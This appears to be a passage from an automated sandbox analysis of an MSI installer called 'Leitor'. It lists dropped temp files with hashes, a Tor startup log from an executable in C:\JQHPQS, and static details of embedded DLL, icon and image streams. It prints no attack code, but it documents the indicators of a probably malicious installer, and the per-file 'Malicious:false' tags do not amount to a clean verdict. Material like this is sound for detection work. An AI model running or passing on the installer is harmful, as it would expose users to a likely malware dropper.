                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Temp\~DFB14C79765BBDE995.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.4761258337922827
                                                Encrypted:false
                                                SSDEEP:48:k8PhOuRc06WXJWjT5JhBgAErCyDSkPUSSkOTY:7hO1tjT3hJwCM/P
                                                MD5:D65CB5ECCDEAEB74A5865B2A937F6A7D
                                                SHA1:EFEE3203E27329A15DD16939C7FC49C5954AD294
                                                SHA-256:39E1FC2EF123B21370AFCD23E16671C4AD292CC0CB0A6A3B3DECCA210732DE60
                                                SHA-512:314B131837440F5777ADD63711435FD4A8D25F513EAF82A4B8EBA026AB94D7D6EC21ED4DA73C97C0A2BC507097E19662D2B1FE55F168577FF824DB6AE74244FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Temp\~DFB462A87B2A3BF2B0.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Temp\~DFEAFE010FEAF503B0.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Temp\~DFED7ED3B179C7609A.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):73728
                                                Entropy (8bit):0.10454138761120342
                                                Encrypted:false
                                                SSDEEP:24:K3tTx+XW9ipV+XWT+XWjAEV0yjCylJipV+XWUVQwG53+kn:4tT4SSkjgAErCyDSkPah
                                                MD5:46DB8C5B4E97DA817331796209AD1B38
                                                SHA1:23E7B5B4C6A63AF4917A4D9B6D76A6B597718696
                                                SHA-256:4EF3F67E589BD303E05C74FBF20CBAF1BB01589E901B48FF6D38C19958ACB10B
                                                SHA-512:9A5007426EAD23F0182885A40E7E501B73853533BAC907657EEACA7883FAB753F337BFDC021C5493CB2B9CBC8B744A1A5FF5ACFFAEE851F6F4D88C0C10C2DAA8
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Temp\~DFF9B8B78DD3B5105A.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                \Device\ConDrv
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):0
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:24:9xApVIjQX3Bn5z4C/v9jP7omqVpSmqVxWwS4hzSZKbjV/8knv:9GXZXxn53jTDap9avSZAUc
                                                MD5:1C1B49D76FD797F4DD10663B5DA52F25
                                                SHA1:9B8DE9D40724A6ACCFAF795E693CBEE03C137005
                                                SHA-256:6C8FCEA81CD4D902C37248D930589207080025A401DAE913B8EC806E796E9B2D
                                                SHA-512:F2CC37A1A80F8A81C74D6D8244FA6BEA7D21A0D8BD6C8D0F832998C8FAD8416FE4B7A301E6BBD910426C329D2FC37C9B9CA064E48432536A095471264407A49C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: Nov 23 21:01:45.311 [notice] Tor 0.4.5.9 (git-d0ed04d50e80fe1c) running on Windows 8 [or later] with Libevent 2.1.12-stable, OpenSSL 1.1.1k, Zlib 1.2.11, Liblzma N/A, Libzstd N/A and Unknown N/A as libc...Nov 23 21:01:45.311 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning..Nov 23 21:01:45.702 [notice] Read configuration file "C:\JQHPQS\AZJVGE"...Nov 23 21:01:45.702 [warn] Path for GeoIPFile (<default>) is relative and will resolve to C:\JQHPQS\<default>. Is this what you wanted?..Nov 23 21:01:45.702 [warn] Path for GeoIPv6File (<default>) is relative and will resolve to C:\JQHPQS\<default>. Is this what you wanted?..Nov 23 21:01:45.000 [warn] It looks like another Tor process is running with the same data directory. Waiting 5 seconds to see if it goes away...Nov 23 21:01:50.000 [err] No, it's still there. Exiting...Nov 23 21:01:50.000 [err] set_options(): Bug: Acting on config options left us in a broken st

                                                Static File Info

                                                General

                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Code page: 1252, Revision Number: {2E1E2189-2426-4422-848B-7807DE130F24}, Number of Words: 10, Subject: Leitor, Author: Leitor, Name of Creating Application: Leitor (Evaluation Installer), Template: ;1046, Comments: 3D9D53ED-FA8C-4FAA-9F38-69FDFB88AED5 (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Security: 0, Number of Pages: 200
                                                Entropy (8bit):7.868304383682033
                                                TrID:
                                                • Microsoft Windows Installer (77509/1) 52.18%
                                                • Windows SDK Setup Transform Script (63028/2) 42.43%
                                                • Generic OLE2 / Multistream Compound File (8008/1) 5.39%
                                                File name:YwZpT3p5Rh.msi
                                                File size:6378496
                                                MD5:5bfe975a60a97c93175c935c6d621e04
                                                SHA1:5bc30f0f540a957d2cc489bbce2c1a7f137069e0
                                                SHA256:464fe77f576d8273564bb5b7976b381855d962017f4da6b5a363af78bf788799
                                                SHA512:dea24ee9d249d715c1dac5976b4b023eb7c15e15b34a5ba31db7d8542c96553f7f0dd33cf86f00759c71dcd5200941eb364e04409dd3193d3e2270d6dffe1130
                                                SSDEEP:98304:s+QXPWTFcvpvyZYHAsmSdP33SfWww2wXaJ/Bci89ZaqN+rFzO4bj/y7dYWePRpwp:7Qex8NdP33SfWwwdKDFZj/QLePRpr3
                                                File Content Preview:........................>...................b...........................................g...............................................................}............................................................... ...!..."...#...$...%...&...'...(...)..

                                                File Icon

                                                Icon Hash:a2a0b496b2caca72

                                                Static OLE Info

                                                General

                                                Document Type:OLE
                                                Number of OLE Files:1

                                                OLE File "YwZpT3p5Rh.msi"

                                                Indicators

                                                Has Summary Info:True
                                                Application Name:Leitor (Evaluation Installer)
                                                Encrypted Document:False
                                                Contains Word Document Stream:False
                                                Contains Workbook/Book Stream:False
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:
                                                Flash Objects Count:
                                                Contains VBA Macros:False

                                                Summary

                                                Code Page:1252
                                                Title:Installation Database
                                                Subject:Leitor
                                                Author:Leitor
                                                Keywords:Installer, MSI, Database
                                                Comments:3D9D53ED-FA8C-4FAA-9F38-69FDFB88AED5 (Evaluation Installer)
                                                Template:;1046
                                                Last Saved By:
                                                Revion Number:{2E1E2189-2426-4422-848B-7807DE130F24}
                                                Last Printed:2009-12-11 11:47:44.850000
                                                Create Time:2009-12-11 11:47:44.850000
                                                Last Saved Time:2020-09-18 14:06:51.913000
                                                Number of Pages:200
                                                Number of Words:10
                                                Creating Application:Leitor (Evaluation Installer)
                                                Security:0

                                                Streams

                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 536
                                                General
                                                Stream Path:\x5SummaryInformation
                                                File Type:data
                                                Stream Size:536
                                                Entropy:4.47330526009
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . # . . W z . . @ . . . # . . W z . . @ . . . . _ . . . . . . . . . . . . . . . . . . ' . . . { 2 E 1 E 2 1 8 9 - 2 4 2 6 - 4 4 2 2 -
                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 e8 01 00 00 10 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 01 00 00 00 ac 00 00 00 09 00 00 00 b4 00 00 00 0f 00 00 00 e4 00 00 00 03 00 00 00 ec 00 00 00 04 00 00 00 fc 00 00 00 08 00 00 00 0c 01 00 00
                                                Stream Path: \x17163\x16689\x18229\x15870\x18088, File Type: MS Windows icon resource - 1 icon, 16x16, 16 colors, Stream Size: 318
                                                General
                                                Stream Path:\x17163\x16689\x18229\x15870\x18088
                                                File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors
                                                Stream Size:318
                                                Entropy:2.03444158006
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . ( . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:00 00 01 00 01 00 10 10 10 00 00 00 00 00 28 01 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00
                                                Stream Path: \x17163\x16689\x18229\x15998\x18098\x17768\x17116\x17384\x16175\x17766\x17644\x15735\x17956\x16817\x16939\x18357\x17383\x18479, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 583136
                                                General
                                                Stream Path:\x17163\x16689\x18229\x15998\x18098\x17768\x17116\x17384\x16175\x17766\x17644\x15735\x17956\x16817\x16939\x18357\x17383\x18479
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Stream Size:583136
                                                Entropy:6.54843667385
                                                Base64 Encoded:True
                                                Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . * l . e n . y 6 n . y 6 n . y 6 z f z 7 c . y 6 z f | 7 . . y 6 z f } 7 x . y 6 < x } 7 . . y 6 < x z 7 y . y 6 _ Q . 6 l . y 6 < x | 7 7 . y 6 z f x 7 } . y 6 n . x 6 b . y 6 6 x p 7 A . y 6 6 x y 7 o . y 6 6 x . 6 o . y 6 n . . 6 o . y 6 6 x { 7 o . y 6
                                                Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                                Stream Path: \x17163\x16689\x18229\x16318\x18483, File Type: MS Windows icon resource - 1 icon, 16x16, 16 colors, Stream Size: 318
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16318\x18483
                                                File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors
                                                Stream Size:318
                                                Entropy:2.03693614652
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . ( . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:00 00 01 00 01 00 10 10 10 00 00 00 00 00 28 01 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00
                                                Stream Path: \x17163\x16689\x18229\x16702\x16812\x17848\x16695\x17894\x16894\x17391, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 402912
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16702\x16812\x17848\x16695\x17894\x16894\x17391
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Stream Size:402912
                                                Entropy:6.38341870549
                                                Base64 Encoded:True
                                                Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . @ . . ! N . . ! N . . ! N . . J M . . ! N . . J K . k ! N . . T J . . ! N . . T M . . ! N . . T K . . ! N . . J J . . ! N . . J H . . ! N . . J O . . ! N . . ! O . . N . v T G . . ! N . v T N . . ! N . v T . . . ! N . . ! . . . ! N . v T L . . ! N .
                                                Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                                Stream Path: \x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14341\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x111, frames 3, Stream Size: 9319
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14341\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x111, frames 3
                                                Stream Size:9319
                                                Entropy:7.35217207818
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                                Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                                Stream Path: \x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14658\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x74, frames 3, Stream Size: 5714
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14658\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x74, frames 3
                                                Stream Size:5714
                                                Entropy:7.42751568247
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                                Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                                Stream Path: \x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14504\x14336\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x222, frames 3, Stream Size: 22946
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14504\x14336\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x222, frames 3
                                                Stream Size:22946
                                                Entropy:6.9205041088
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                                Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                                Stream Path: \x17163\x16689\x18229\x16766\x17508\x16945\x18357\x17645\x18474, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, frames 3, Stream Size: 4502
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x17645\x18474
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, frames 3
                                                Stream Size:4502
                                                Entropy:7.59347638402
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                                Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                                Stream Path: \x17163\x16689\x18229\x16830\x16880\x17199\x17329\x17764\x17589\x18490, File Type: MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel, Stream Size: 2862
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16830\x16880\x17199\x17329\x17764\x17589\x18490
                                                File Type:MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                Stream Size:2862
                                                Entropy:3.16043065194
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . ( . . . 6 . . . . . . . . . . . h . . . ^ . . . . . . . . . . h . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w v . . . . . " " " " " o . . " " " " " o . . w w w " " . . . . . . " / . . . .
                                                Data Raw:00 00 01 00 03 00 10 10 10 00 00 00 04 00 28 01 00 00 36 00 00 00 10 10 00 00 00 00 08 00 68 05 00 00 5e 01 00 00 10 10 00 00 00 00 20 00 68 04 00 00 c6 06 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0
                                                Stream Path: \x17163\x16689\x18229\x16830\x17458\x17395\x17896\x18476, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16830\x17458\x17395\x17896\x18476
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                                Stream Size:2998
                                                Entropy:4.35906224297
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . . . . . { . w . . . . . . . .
                                                Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                                Stream Path: \x17163\x16689\x18229\x16830\x17848\x17207\x17574\x18481, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16830\x17848\x17207\x17574\x18481
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                                Stream Size:2998
                                                Entropy:4.29856879699
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . . . . . { . w . . . . . . . .
                                                Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                                Stream Path: \x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14341\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x593, frames 3, Stream Size: 27770
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14341\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x593, frames 3
                                                Stream Size:27770
                                                Entropy:7.06368048149
                                                Base64 Encoded:True
